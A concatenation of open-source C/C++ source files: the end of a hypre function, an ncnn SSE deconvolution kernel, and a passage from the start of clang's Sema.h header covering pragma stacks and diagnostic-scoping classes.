hypre_TFree(dof_func_offd, HYPRE_MEMORY_HOST);
}
hypre_MatvecCommPkgDestroy(extend_comm_pkg);
}
return hypre_error_flag;
}
|
deconvolution_pack4to1.h | // Tencent is pleased to support the open source community by making ncnn available.
//
// Copyright (C) 2022 THL A29 Limited, a Tencent company. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
static void deconvolution_pack4to1_sse(const Mat& bottom_blob, Mat& top_blob, const Mat& weight_data_packed, const Mat& bias_data, int kernel_w, int kernel_h, int dilation_w, int dilation_h, int stride_w, int stride_h, int activation_type, const Mat& activation_params, const Option& opt)
{
int w = bottom_blob.w;
int h = bottom_blob.h;
int channels = bottom_blob.c;
int outw = top_blob.w;
int outh = top_blob.h;
int outch = top_blob.c;
const int kernel_extent_w = dilation_w * (kernel_w - 1) + 1;
const int kernel_extent_h = dilation_h * (kernel_h - 1) + 1;
const int maxk = kernel_w * kernel_h;
const float* bias_data_ptr = bias_data;
// num_output
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
float* outptr = top_blob.channel(p);
for (int i = 0; i < outh; i++)
{
for (int j = 0; j < outw; j++)
{
float sum = 0.f;
if (bias_data_ptr)
{
sum = bias_data_ptr[p];
}
__m128 _sum = _mm_setzero_ps();
const float* kptr = weight_data_packed.channel(p);
// channels
for (int q = 0; q < channels; q++)
{
const Mat m = bottom_blob.channel(q);
for (int y = 0; y < kernel_h; y++)
{
int sys = (i + y * dilation_h - (kernel_extent_h - 1));
if (sys < 0 || sys % stride_h != 0)
continue;
int sy = sys / stride_h;
if (sy >= h)
continue;
for (int x = 0; x < kernel_w; x++)
{
int sxs = (j + x * dilation_w - (kernel_extent_w - 1));
if (sxs < 0 || sxs % stride_w != 0)
continue;
int sx = sxs / stride_w;
if (sx >= w)
continue;
const float* sptr = m.row(sy) + sx * 4;
int k = y * kernel_w + x;
__m128 _val = _mm_load_ps(sptr);
__m128 _w = _mm_load_ps(kptr + k * 4);
_sum = _mm_comp_fmadd_ps(_val, _w, _sum);
}
}
kptr += maxk * 4;
}
sum += _mm_reduce_add_ps(_sum);
sum = activation_ss(sum, activation_type, activation_params);
outptr[0] = sum;
outptr++;
}
}
}
}
|
Sema.h | //===--- Sema.h - Semantic Analysis & AST Building --------------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This file defines the Sema class, which performs semantic analysis and
// builds ASTs.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_SEMA_SEMA_H
#define LLVM_CLANG_SEMA_SEMA_H
#include "clang/AST/ASTConcept.h"
#include "clang/AST/ASTFwd.h"
#include "clang/AST/Attr.h"
#include "clang/AST/Availability.h"
#include "clang/AST/ComparisonCategories.h"
#include "clang/AST/DeclTemplate.h"
#include "clang/AST/DeclarationName.h"
#include "clang/AST/Expr.h"
#include "clang/AST/ExprCXX.h"
#include "clang/AST/ExprConcepts.h"
#include "clang/AST/ExprObjC.h"
#include "clang/AST/ExprOpenMP.h"
#include "clang/AST/ExternalASTSource.h"
#include "clang/AST/LocInfoType.h"
#include "clang/AST/MangleNumberingContext.h"
#include "clang/AST/NSAPI.h"
#include "clang/AST/PrettyPrinter.h"
#include "clang/AST/StmtCXX.h"
#include "clang/AST/TypeLoc.h"
#include "clang/APINotes/APINotesManager.h"
#include "clang/AST/TypeOrdering.h"
#include "clang/Basic/BitmaskEnum.h"
#include "clang/Basic/ExpressionTraits.h"
#include "clang/Basic/Module.h"
#include "clang/Basic/OpenCLOptions.h"
#include "clang/Basic/OpenMPKinds.h"
#include "clang/Basic/PragmaKinds.h"
#include "clang/Basic/Specifiers.h"
#include "clang/Basic/TemplateKinds.h"
#include "clang/Basic/TypeTraits.h"
#include "clang/Sema/AnalysisBasedWarnings.h"
#include "clang/Sema/CleanupInfo.h"
#include "clang/Sema/DeclSpec.h"
#include "clang/Sema/ExternalSemaSource.h"
#include "clang/Sema/IdentifierResolver.h"
#include "clang/Sema/ObjCMethodList.h"
#include "clang/Sema/Ownership.h"
#include "clang/Sema/Scope.h"
#include "clang/Sema/SemaConcept.h"
#include "clang/Sema/TypoCorrection.h"
#include "clang/Sema/Weak.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/Optional.h"
#include "llvm/ADT/SetVector.h"
#include "llvm/ADT/SmallBitVector.h"
#include "llvm/ADT/SmallSet.h"
#include "llvm/ADT/SmallPtrSet.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/ADT/TinyPtrVector.h"
#include "llvm/Frontend/OpenMP/OMPConstants.h"
#include <deque>
#include <functional>
#include <memory>
#include <string>
#include <tuple>
#include <vector>
namespace llvm {
class APSInt;
template <typename ValueT> struct DenseMapInfo;
template <typename ValueT, typename ValueInfoT> class DenseSet;
class SmallBitVector;
struct InlineAsmIdentifierInfo;
}
namespace clang {
class ADLResult;
class ASTConsumer;
class ASTContext;
class ASTMutationListener;
class ASTReader;
class ASTWriter;
class ArrayType;
class ParsedAttr;
class BindingDecl;
class BlockDecl;
class CapturedDecl;
class CXXBasePath;
class CXXBasePaths;
class CXXBindTemporaryExpr;
typedef SmallVector<CXXBaseSpecifier*, 4> CXXCastPath;
class CXXConstructorDecl;
class CXXConversionDecl;
class CXXDeleteExpr;
class CXXDestructorDecl;
class CXXFieldCollector;
class CXXMemberCallExpr;
class CXXMethodDecl;
class CXXScopeSpec;
class CXXTemporary;
class CXXTryStmt;
class CallExpr;
class ClassTemplateDecl;
class ClassTemplatePartialSpecializationDecl;
class ClassTemplateSpecializationDecl;
class VarTemplatePartialSpecializationDecl;
class CodeCompleteConsumer;
class CodeCompletionAllocator;
class CodeCompletionTUInfo;
class CodeCompletionResult;
class CoroutineBodyStmt;
class Decl;
class DeclAccessPair;
class DeclContext;
class DeclRefExpr;
class DeclaratorDecl;
class DeducedTemplateArgument;
class DependentDiagnostic;
class DesignatedInitExpr;
class Designation;
class EnableIfAttr;
class EnumConstantDecl;
class Expr;
class ExtVectorType;
class FormatAttr;
class FriendDecl;
class FunctionDecl;
class FunctionProtoType;
class FunctionTemplateDecl;
class ImplicitConversionSequence;
typedef MutableArrayRef<ImplicitConversionSequence> ConversionSequenceList;
class InitListExpr;
class InitializationKind;
class InitializationSequence;
class InitializedEntity;
class IntegerLiteral;
class LabelStmt;
class LambdaExpr;
class LangOptions;
class LocalInstantiationScope;
class LookupResult;
class MacroInfo;
typedef ArrayRef<std::pair<IdentifierInfo *, SourceLocation>> ModuleIdPath;
class ModuleLoader;
class MultiLevelTemplateArgumentList;
class NamedDecl;
class ObjCCategoryDecl;
class ObjCCategoryImplDecl;
class ObjCCompatibleAliasDecl;
class ObjCContainerDecl;
class ObjCImplDecl;
class ObjCImplementationDecl;
class ObjCInterfaceDecl;
class ObjCIvarDecl;
template <class T> class ObjCList;
class ObjCMessageExpr;
class ObjCMethodDecl;
class ObjCPropertyDecl;
class ObjCProtocolDecl;
class OMPThreadPrivateDecl;
class OMPRequiresDecl;
class OMPDeclareReductionDecl;
class OMPDeclareSimdDecl;
class OMPClause;
struct OMPVarListLocTy;
struct OverloadCandidate;
enum class OverloadCandidateParamOrder : char;
enum OverloadCandidateRewriteKind : unsigned;
class OverloadCandidateSet;
class OverloadExpr;
class ParenListExpr;
class ParmVarDecl;
class Preprocessor;
class PseudoDestructorTypeStorage;
class PseudoObjectExpr;
class QualType;
class StandardConversionSequence;
class Stmt;
class StringLiteral;
class SwitchStmt;
class TemplateArgument;
class TemplateArgumentList;
class TemplateArgumentLoc;
class TemplateDecl;
class TemplateInstantiationCallback;
class TemplateParameterList;
class TemplatePartialOrderingContext;
class TemplateTemplateParmDecl;
class Token;
class TypeAliasDecl;
class TypedefDecl;
class TypedefNameDecl;
class TypeLoc;
class TypoCorrectionConsumer;
class UnqualifiedId;
class UnresolvedLookupExpr;
class UnresolvedMemberExpr;
class UnresolvedSetImpl;
class UnresolvedSetIterator;
class UsingDecl;
class UsingShadowDecl;
class ValueDecl;
class VarDecl;
class VarTemplateSpecializationDecl;
class VisibilityAttr;
class VisibleDeclConsumer;
class IndirectFieldDecl;
struct DeductionFailureInfo;
class TemplateSpecCandidateSet;
namespace sema {
class AccessedEntity;
class BlockScopeInfo;
class Capture;
class CapturedRegionScopeInfo;
class CapturingScopeInfo;
class CompoundScopeInfo;
class DelayedDiagnostic;
class DelayedDiagnosticPool;
class FunctionScopeInfo;
class LambdaScopeInfo;
class PossiblyUnreachableDiag;
class SemaPPCallbacks;
class TemplateDeductionInfo;
}
namespace threadSafety {
class BeforeSet;
void threadSafetyCleanup(BeforeSet* Cache);
}
// FIXME: No way to easily map from TemplateTypeParmTypes to
// TemplateTypeParmDecls, so we have this horrible PointerUnion.
typedef std::pair<llvm::PointerUnion<const TemplateTypeParmType*, NamedDecl*>,
SourceLocation> UnexpandedParameterPack;
/// Describes whether we've seen any nullability information for the given
/// file.
struct FileNullability {
/// The first pointer declarator (of any pointer kind) in the file that does
/// not have a corresponding nullability annotation.
SourceLocation PointerLoc;
/// The end location for the first pointer declarator in the file. Used for
/// placing fix-its.
SourceLocation PointerEndLoc;
/// Which kind of pointer declarator we saw.
uint8_t PointerKind;
/// Whether we saw any type nullability annotations in the given file.
bool SawTypeNullability = false;
};
/// A mapping from file IDs to a record of whether we've seen nullability
/// information in that file.
class FileNullabilityMap {
/// A mapping from file IDs to the nullability information for each file ID.
llvm::DenseMap<FileID, FileNullability> Map;
/// A single-element cache based on the file ID.
struct {
FileID File;
FileNullability Nullability;
} Cache;
public:
FileNullability &operator[](FileID file) {
// Check the single-element cache.
if (file == Cache.File)
return Cache.Nullability;
// It's not in the single-element cache; flush the cache if we have one.
if (!Cache.File.isInvalid()) {
Map[Cache.File] = Cache.Nullability;
}
// Pull this entry into the cache.
Cache.File = file;
Cache.Nullability = Map[file];
return Cache.Nullability;
}
};
/// Keeps track of expected type during expression parsing. The type is tied to
/// a particular token, all functions that update or consume the type take a
/// start location of the token they are looking at as a parameter. This allows
/// to avoid updating the type on hot paths in the parser.
class PreferredTypeBuilder {
public:
PreferredTypeBuilder() = default;
explicit PreferredTypeBuilder(QualType Type) : Type(Type) {}
void enterCondition(Sema &S, SourceLocation Tok);
void enterReturn(Sema &S, SourceLocation Tok);
void enterVariableInit(SourceLocation Tok, Decl *D);
/// Computing a type for the function argument may require running
/// overloading, so we postpone its computation until it is actually needed.
///
/// Clients should be very careful when using this funciton, as it stores a
/// function_ref, clients should make sure all calls to get() with the same
/// location happen while function_ref is alive.
void enterFunctionArgument(SourceLocation Tok,
llvm::function_ref<QualType()> ComputeType);
void enterParenExpr(SourceLocation Tok, SourceLocation LParLoc);
void enterUnary(Sema &S, SourceLocation Tok, tok::TokenKind OpKind,
SourceLocation OpLoc);
void enterBinary(Sema &S, SourceLocation Tok, Expr *LHS, tok::TokenKind Op);
void enterMemAccess(Sema &S, SourceLocation Tok, Expr *Base);
void enterSubscript(Sema &S, SourceLocation Tok, Expr *LHS);
/// Handles all type casts, including C-style cast, C++ casts, etc.
void enterTypeCast(SourceLocation Tok, QualType CastType);
QualType get(SourceLocation Tok) const {
if (Tok != ExpectedLoc)
return QualType();
if (!Type.isNull())
return Type;
if (ComputeType)
return ComputeType();
return QualType();
}
private:
/// Start position of a token for which we store expected type.
SourceLocation ExpectedLoc;
/// Expected type for a token starting at ExpectedLoc.
QualType Type;
/// A function to compute expected type at ExpectedLoc. It is only considered
/// if Type is null.
llvm::function_ref<QualType()> ComputeType;
};
/// Sema - This implements semantic analysis and AST building for C.
class Sema final {
Sema(const Sema &) = delete;
void operator=(const Sema &) = delete;
/// A key method to reduce duplicate debug info from Sema.
virtual void anchor();
///Source of additional semantic information.
ExternalSemaSource *ExternalSource;
///Whether Sema has generated a multiplexer and has to delete it.
bool isMultiplexExternalSource;
static bool mightHaveNonExternalLinkage(const DeclaratorDecl *FD);
bool isVisibleSlow(const NamedDecl *D);
/// Determine whether two declarations should be linked together, given that
/// the old declaration might not be visible and the new declaration might
/// not have external linkage.
bool shouldLinkPossiblyHiddenDecl(const NamedDecl *Old,
const NamedDecl *New) {
if (isVisible(Old))
return true;
// See comment in below overload for why it's safe to compute the linkage
// of the new declaration here.
if (New->isExternallyDeclarable()) {
assert(Old->isExternallyDeclarable() &&
"should not have found a non-externally-declarable previous decl");
return true;
}
return false;
}
bool shouldLinkPossiblyHiddenDecl(LookupResult &Old, const NamedDecl *New);
void setupImplicitSpecialMemberType(CXXMethodDecl *SpecialMem,
QualType ResultTy,
ArrayRef<QualType> Args);
public:
/// The maximum alignment, same as in llvm::Value. We duplicate them here
/// because that allows us not to duplicate the constants in clang code,
/// which we must to since we can't directly use the llvm constants.
/// The value is verified against llvm here: lib/CodeGen/CGDecl.cpp
///
/// This is the greatest alignment value supported by load, store, and alloca
/// instructions, and global values.
static const unsigned MaxAlignmentExponent = 29;
static const unsigned MaximumAlignment = 1u << MaxAlignmentExponent;
typedef OpaquePtr<DeclGroupRef> DeclGroupPtrTy;
typedef OpaquePtr<TemplateName> TemplateTy;
typedef OpaquePtr<QualType> TypeTy;
OpenCLOptions OpenCLFeatures;
FPOptions CurFPFeatures;
const LangOptions &LangOpts;
Preprocessor &PP;
ASTContext &Context;
ASTConsumer &Consumer;
DiagnosticsEngine &Diags;
SourceManager &SourceMgr;
api_notes::APINotesManager APINotes;
/// Flag indicating whether or not to collect detailed statistics.
bool CollectStats;
/// Code-completion consumer.
CodeCompleteConsumer *CodeCompleter;
/// CurContext - This is the current declaration context of parsing.
DeclContext *CurContext;
/// Generally null except when we temporarily switch decl contexts,
/// like in \see ActOnObjCTemporaryExitContainerContext.
DeclContext *OriginalLexicalContext;
/// VAListTagName - The declaration name corresponding to __va_list_tag.
/// This is used as part of a hack to omit that class from ADL results.
DeclarationName VAListTagName;
bool MSStructPragmaOn; // True when \#pragma ms_struct on
/// Controls member pointer representation format under the MS ABI.
LangOptions::PragmaMSPointersToMembersKind
MSPointerToMemberRepresentationMethod;
/// Stack of active SEH __finally scopes. Can be empty.
SmallVector<Scope*, 2> CurrentSEHFinally;
/// Source location for newly created implicit MSInheritanceAttrs
SourceLocation ImplicitMSInheritanceAttrLoc;
/// Holds TypoExprs that are created from `createDelayedTypo`. This is used by
/// `TransformTypos` in order to keep track of any TypoExprs that are created
/// recursively during typo correction and wipe them away if the correction
/// fails.
llvm::SmallVector<TypoExpr *, 2> TypoExprs;
/// pragma clang section kind
enum PragmaClangSectionKind {
PCSK_Invalid = 0,
PCSK_BSS = 1,
PCSK_Data = 2,
PCSK_Rodata = 3,
PCSK_Text = 4,
PCSK_Relro = 5
};
enum PragmaClangSectionAction {
PCSA_Set = 0,
PCSA_Clear = 1
};
struct PragmaClangSection {
std::string SectionName;
bool Valid = false;
SourceLocation PragmaLocation;
void Act(SourceLocation PragmaLocation,
PragmaClangSectionAction Action,
StringLiteral* Name);
};
PragmaClangSection PragmaClangBSSSection;
PragmaClangSection PragmaClangDataSection;
PragmaClangSection PragmaClangRodataSection;
PragmaClangSection PragmaClangRelroSection;
PragmaClangSection PragmaClangTextSection;
enum PragmaMsStackAction {
PSK_Reset = 0x0, // #pragma ()
PSK_Set = 0x1, // #pragma (value)
PSK_Push = 0x2, // #pragma (push[, id])
PSK_Pop = 0x4, // #pragma (pop[, id])
PSK_Show = 0x8, // #pragma (show) -- only for "pack"!
PSK_Push_Set = PSK_Push | PSK_Set, // #pragma (push[, id], value)
PSK_Pop_Set = PSK_Pop | PSK_Set, // #pragma (pop[, id], value)
};
template<typename ValueType>
struct PragmaStack {
struct Slot {
llvm::StringRef StackSlotLabel;
ValueType Value;
SourceLocation PragmaLocation;
SourceLocation PragmaPushLocation;
Slot(llvm::StringRef StackSlotLabel, ValueType Value,
SourceLocation PragmaLocation, SourceLocation PragmaPushLocation)
: StackSlotLabel(StackSlotLabel), Value(Value),
PragmaLocation(PragmaLocation),
PragmaPushLocation(PragmaPushLocation) {}
};
void Act(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
ValueType Value);
// MSVC seems to add artificial slots to #pragma stacks on entering a C++
// method body to restore the stacks on exit, so it works like this:
//
// struct S {
// #pragma <name>(push, InternalPragmaSlot, <current_pragma_value>)
// void Method {}
// #pragma <name>(pop, InternalPragmaSlot)
// };
//
// It works even with #pragma vtordisp, although MSVC doesn't support
// #pragma vtordisp(push [, id], n)
// syntax.
//
// Push / pop a named sentinel slot.
void SentinelAction(PragmaMsStackAction Action, StringRef Label) {
assert((Action == PSK_Push || Action == PSK_Pop) &&
"Can only push / pop #pragma stack sentinels!");
Act(CurrentPragmaLocation, Action, Label, CurrentValue);
}
// Constructors.
explicit PragmaStack(const ValueType &Default)
: DefaultValue(Default), CurrentValue(Default) {}
bool hasValue() const { return CurrentValue != DefaultValue; }
SmallVector<Slot, 2> Stack;
ValueType DefaultValue; // Value used for PSK_Reset action.
ValueType CurrentValue;
SourceLocation CurrentPragmaLocation;
};
// FIXME: We should serialize / deserialize these if they occur in a PCH (but
// we shouldn't do so if they're in a module).
/// Whether to insert vtordisps prior to virtual bases in the Microsoft
/// C++ ABI. Possible values are 0, 1, and 2, which mean:
///
/// 0: Suppress all vtordisps
/// 1: Insert vtordisps in the presence of vbase overrides and non-trivial
/// structors
/// 2: Always insert vtordisps to support RTTI on partially constructed
/// objects
PragmaStack<MSVtorDispMode> VtorDispStack;
// #pragma pack.
// Sentinel to represent when the stack is set to mac68k alignment.
static const unsigned kMac68kAlignmentSentinel = ~0U;
PragmaStack<unsigned> PackStack;
// The current #pragma pack values and locations at each #include.
struct PackIncludeState {
unsigned CurrentValue;
SourceLocation CurrentPragmaLocation;
bool HasNonDefaultValue, ShouldWarnOnInclude;
};
SmallVector<PackIncludeState, 8> PackIncludeStack;
// Segment #pragmas.
PragmaStack<StringLiteral *> DataSegStack;
PragmaStack<StringLiteral *> BSSSegStack;
PragmaStack<StringLiteral *> ConstSegStack;
PragmaStack<StringLiteral *> CodeSegStack;
// This stack tracks the current state of Sema.CurFPFeatures.
PragmaStack<unsigned> FpPragmaStack;
// RAII object to push / pop sentinel slots for all MS #pragma stacks.
// Actions should be performed only if we enter / exit a C++ method body.
class PragmaStackSentinelRAII {
public:
PragmaStackSentinelRAII(Sema &S, StringRef SlotLabel, bool ShouldAct);
~PragmaStackSentinelRAII();
private:
Sema &S;
StringRef SlotLabel;
bool ShouldAct;
};
/// A mapping that describes the nullability we've seen in each header file.
FileNullabilityMap NullabilityMap;
/// Last section used with #pragma init_seg.
StringLiteral *CurInitSeg;
SourceLocation CurInitSegLoc;
/// VisContext - Manages the stack for \#pragma GCC visibility.
void *VisContext; // Really a "PragmaVisStack*"
/// This an attribute introduced by \#pragma clang attribute.
struct PragmaAttributeEntry {
SourceLocation Loc;
ParsedAttr *Attribute;
SmallVector<attr::SubjectMatchRule, 4> MatchRules;
bool IsUsed;
};
/// A push'd group of PragmaAttributeEntries.
struct PragmaAttributeGroup {
/// The location of the push attribute.
SourceLocation Loc;
/// The namespace of this push group.
const IdentifierInfo *Namespace;
SmallVector<PragmaAttributeEntry, 2> Entries;
};
SmallVector<PragmaAttributeGroup, 2> PragmaAttributeStack;
/// The declaration that is currently receiving an attribute from the
/// #pragma attribute stack.
const Decl *PragmaAttributeCurrentTargetDecl;
/// This represents the last location of a "#pragma clang optimize off"
/// directive if such a directive has not been closed by an "on" yet. If
/// optimizations are currently "on", this is set to an invalid location.
SourceLocation OptimizeOffPragmaLocation;
/// Flag indicating if Sema is building a recovery call expression.
///
/// This flag is used to avoid building recovery call expressions
/// if Sema is already doing so, which would cause infinite recursions.
bool IsBuildingRecoveryCallExpr;
/// Used to control the generation of ExprWithCleanups.
CleanupInfo Cleanup;
/// ExprCleanupObjects - This is the stack of objects requiring
/// cleanup that are created by the current full expression.
SmallVector<ExprWithCleanups::CleanupObject, 8> ExprCleanupObjects;
/// Store a set of either DeclRefExprs or MemberExprs that contain a reference
/// to a variable (constant) that may or may not be odr-used in this Expr, and
/// we won't know until all lvalue-to-rvalue and discarded value conversions
/// have been applied to all subexpressions of the enclosing full expression.
/// This is cleared at the end of each full expression.
using MaybeODRUseExprSet = llvm::SmallPtrSet<Expr *, 2>;
MaybeODRUseExprSet MaybeODRUseExprs;
std::unique_ptr<sema::FunctionScopeInfo> CachedFunctionScope;
/// Stack containing information about each of the nested
/// function, block, and method scopes that are currently active.
SmallVector<sema::FunctionScopeInfo *, 4> FunctionScopes;
/// The index of the first FunctionScope that corresponds to the current
/// context.
unsigned FunctionScopesStart = 0;
ArrayRef<sema::FunctionScopeInfo*> getFunctionScopes() const {
return llvm::makeArrayRef(FunctionScopes.begin() + FunctionScopesStart,
FunctionScopes.end());
}
/// Stack containing information needed when in C++2a an 'auto' is encountered
/// in a function declaration parameter type specifier in order to invent a
/// corresponding template parameter in the enclosing abbreviated function
/// template. This information is also present in LambdaScopeInfo, stored in
/// the FunctionScopes stack.
SmallVector<InventedTemplateParameterInfo, 4> InventedParameterInfos;
/// The index of the first InventedParameterInfo that refers to the current
/// context.
unsigned InventedParameterInfosStart = 0;
ArrayRef<InventedTemplateParameterInfo> getInventedParameterInfos() const {
return llvm::makeArrayRef(InventedParameterInfos.begin() +
InventedParameterInfosStart,
InventedParameterInfos.end());
}
typedef LazyVector<TypedefNameDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadExtVectorDecls, 2, 2>
ExtVectorDeclsType;
/// ExtVectorDecls - This is a list all the extended vector types. This allows
/// us to associate a raw vector type with one of the ext_vector type names.
/// This is only necessary for issuing pretty diagnostics.
ExtVectorDeclsType ExtVectorDecls;
/// FieldCollector - Collects CXXFieldDecls during parsing of C++ classes.
std::unique_ptr<CXXFieldCollector> FieldCollector;
typedef llvm::SmallSetVector<NamedDecl *, 16> NamedDeclSetType;
/// Set containing all declared private fields that are not used.
NamedDeclSetType UnusedPrivateFields;
/// Set containing all typedefs that are likely unused.
llvm::SmallSetVector<const TypedefNameDecl *, 4>
UnusedLocalTypedefNameCandidates;
/// Delete-expressions to be analyzed at the end of translation unit
///
/// This list contains class members, and locations of delete-expressions
/// that could not be proven as to whether they mismatch with new-expression
/// used in initializer of the field.
typedef std::pair<SourceLocation, bool> DeleteExprLoc;
typedef llvm::SmallVector<DeleteExprLoc, 4> DeleteLocs;
llvm::MapVector<FieldDecl *, DeleteLocs> DeleteExprs;
typedef llvm::SmallPtrSet<const CXXRecordDecl*, 8> RecordDeclSetTy;
/// PureVirtualClassDiagSet - a set of class declarations which we have
/// emitted a list of pure virtual functions. Used to prevent emitting the
/// same list more than once.
std::unique_ptr<RecordDeclSetTy> PureVirtualClassDiagSet;
/// ParsingInitForAutoVars - a set of declarations with auto types for which
/// we are currently parsing the initializer.
llvm::SmallPtrSet<const Decl*, 4> ParsingInitForAutoVars;
/// Look for a locally scoped extern "C" declaration by the given name.
NamedDecl *findLocallyScopedExternCDecl(DeclarationName Name);
typedef LazyVector<VarDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadTentativeDefinitions, 2, 2>
TentativeDefinitionsType;
/// All the tentative definitions encountered in the TU.
TentativeDefinitionsType TentativeDefinitions;
/// All the external declarations encoutered and used in the TU.
SmallVector<VarDecl *, 4> ExternalDeclarations;
typedef LazyVector<const DeclaratorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadUnusedFileScopedDecls, 2, 2>
UnusedFileScopedDeclsType;
/// The set of file scoped decls seen so far that have not been used
/// and must warn if not used. Only contains the first declaration.
UnusedFileScopedDeclsType UnusedFileScopedDecls;
typedef LazyVector<CXXConstructorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadDelegatingConstructors, 2, 2>
DelegatingCtorDeclsType;
/// All the delegating constructors seen so far in the file, used for
/// cycle detection at the end of the TU.
DelegatingCtorDeclsType DelegatingCtorDecls;
/// All the overriding functions seen during a class definition
/// that had their exception spec checks delayed, plus the overridden
/// function.
SmallVector<std::pair<const CXXMethodDecl*, const CXXMethodDecl*>, 2>
DelayedOverridingExceptionSpecChecks;
/// All the function redeclarations seen during a class definition that had
/// their exception spec checks delayed, plus the prior declaration they
/// should be checked against. Except during error recovery, the new decl
/// should always be a friend declaration, as that's the only valid way to
/// redeclare a special member before its class is complete.
SmallVector<std::pair<FunctionDecl*, FunctionDecl*>, 2>
DelayedEquivalentExceptionSpecChecks;
typedef llvm::MapVector<const FunctionDecl *,
std::unique_ptr<LateParsedTemplate>>
LateParsedTemplateMapT;
LateParsedTemplateMapT LateParsedTemplateMap;
/// Callback to the parser to parse templated functions when needed.
typedef void LateTemplateParserCB(void *P, LateParsedTemplate &LPT);
typedef void LateTemplateParserCleanupCB(void *P);
LateTemplateParserCB *LateTemplateParser;
LateTemplateParserCleanupCB *LateTemplateParserCleanup;
void *OpaqueParser;
void SetLateTemplateParser(LateTemplateParserCB *LTP,
LateTemplateParserCleanupCB *LTPCleanup,
void *P) {
LateTemplateParser = LTP;
LateTemplateParserCleanup = LTPCleanup;
OpaqueParser = P;
}
/// \brief Callback to the parser to parse a type expressed as a string.
std::function<TypeResult(StringRef, StringRef, SourceLocation)>
ParseTypeFromStringCallback;
class DelayedDiagnostics;
class DelayedDiagnosticsState {
sema::DelayedDiagnosticPool *SavedPool;
friend class Sema::DelayedDiagnostics;
};
typedef DelayedDiagnosticsState ParsingDeclState;
typedef DelayedDiagnosticsState ProcessingContextState;
/// A class which encapsulates the logic for delaying diagnostics
/// during parsing and other processing.
class DelayedDiagnostics {
/// The current pool of diagnostics into which delayed
/// diagnostics should go.
sema::DelayedDiagnosticPool *CurPool;
public:
DelayedDiagnostics() : CurPool(nullptr) {}
/// Adds a delayed diagnostic.
void add(const sema::DelayedDiagnostic &diag); // in DelayedDiagnostic.h
/// Determines whether diagnostics should be delayed.
bool shouldDelayDiagnostics() { return CurPool != nullptr; }
/// Returns the current delayed-diagnostics pool.
sema::DelayedDiagnosticPool *getCurrentPool() const {
return CurPool;
}
/// Enter a new scope. Access and deprecation diagnostics will be
/// collected in this pool.
DelayedDiagnosticsState push(sema::DelayedDiagnosticPool &pool) {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = &pool;
return state;
}
/// Leave a delayed-diagnostic state that was previously pushed.
/// Do not emit any of the diagnostics. This is performed as part
/// of the bookkeeping of popping a pool "properly".
void popWithoutEmitting(DelayedDiagnosticsState state) {
CurPool = state.SavedPool;
}
/// Enter a new scope where access and deprecation diagnostics are
/// not delayed.
DelayedDiagnosticsState pushUndelayed() {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = nullptr;
return state;
}
/// Undo a previous pushUndelayed().
void popUndelayed(DelayedDiagnosticsState state) {
assert(CurPool == nullptr);
CurPool = state.SavedPool;
}
} DelayedDiagnostics;
/// A RAII object to temporarily push a declaration context.
class ContextRAII {
private:
Sema &S;
DeclContext *SavedContext;
ProcessingContextState SavedContextState;
QualType SavedCXXThisTypeOverride;
unsigned SavedFunctionScopesStart;
unsigned SavedInventedParameterInfosStart;
public:
ContextRAII(Sema &S, DeclContext *ContextToPush, bool NewThisContext = true)
: S(S), SavedContext(S.CurContext),
SavedContextState(S.DelayedDiagnostics.pushUndelayed()),
SavedCXXThisTypeOverride(S.CXXThisTypeOverride),
SavedFunctionScopesStart(S.FunctionScopesStart),
SavedInventedParameterInfosStart(S.InventedParameterInfosStart)
{
assert(ContextToPush && "pushing null context");
S.CurContext = ContextToPush;
if (NewThisContext)
S.CXXThisTypeOverride = QualType();
// Any saved FunctionScopes do not refer to this context.
S.FunctionScopesStart = S.FunctionScopes.size();
S.InventedParameterInfosStart = S.InventedParameterInfos.size();
}
void pop() {
if (!SavedContext) return;
S.CurContext = SavedContext;
S.DelayedDiagnostics.popUndelayed(SavedContextState);
S.CXXThisTypeOverride = SavedCXXThisTypeOverride;
S.FunctionScopesStart = SavedFunctionScopesStart;
S.InventedParameterInfosStart = SavedInventedParameterInfosStart;
SavedContext = nullptr;
}
~ContextRAII() {
pop();
}
};
/// Whether the AST is currently being rebuilt to correct immediate
/// invocations. Immediate invocation candidates and references to consteval
/// functions aren't tracked when this is set.
bool RebuildingImmediateInvocation = false;
/// Used to change context to isConstantEvaluated without pushing a heavy
/// ExpressionEvaluationContextRecord object.
bool isConstantEvaluatedOverride;
bool isConstantEvaluated() {
return ExprEvalContexts.back().isConstantEvaluated() ||
isConstantEvaluatedOverride;
}
/// RAII object to handle the state changes required to synthesize
/// a function body.
class SynthesizedFunctionScope {
Sema &S;
Sema::ContextRAII SavedContext;
bool PushedCodeSynthesisContext = false;
public:
SynthesizedFunctionScope(Sema &S, DeclContext *DC)
: S(S), SavedContext(S, DC) {
S.PushFunctionScope();
S.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::PotentiallyEvaluated);
if (auto *FD = dyn_cast<FunctionDecl>(DC))
FD->setWillHaveBody(true);
else
assert(isa<ObjCMethodDecl>(DC));
}
void addContextNote(SourceLocation UseLoc) {
assert(!PushedCodeSynthesisContext);
Sema::CodeSynthesisContext Ctx;
Ctx.Kind = Sema::CodeSynthesisContext::DefiningSynthesizedFunction;
Ctx.PointOfInstantiation = UseLoc;
Ctx.Entity = cast<Decl>(S.CurContext);
S.pushCodeSynthesisContext(Ctx);
PushedCodeSynthesisContext = true;
}
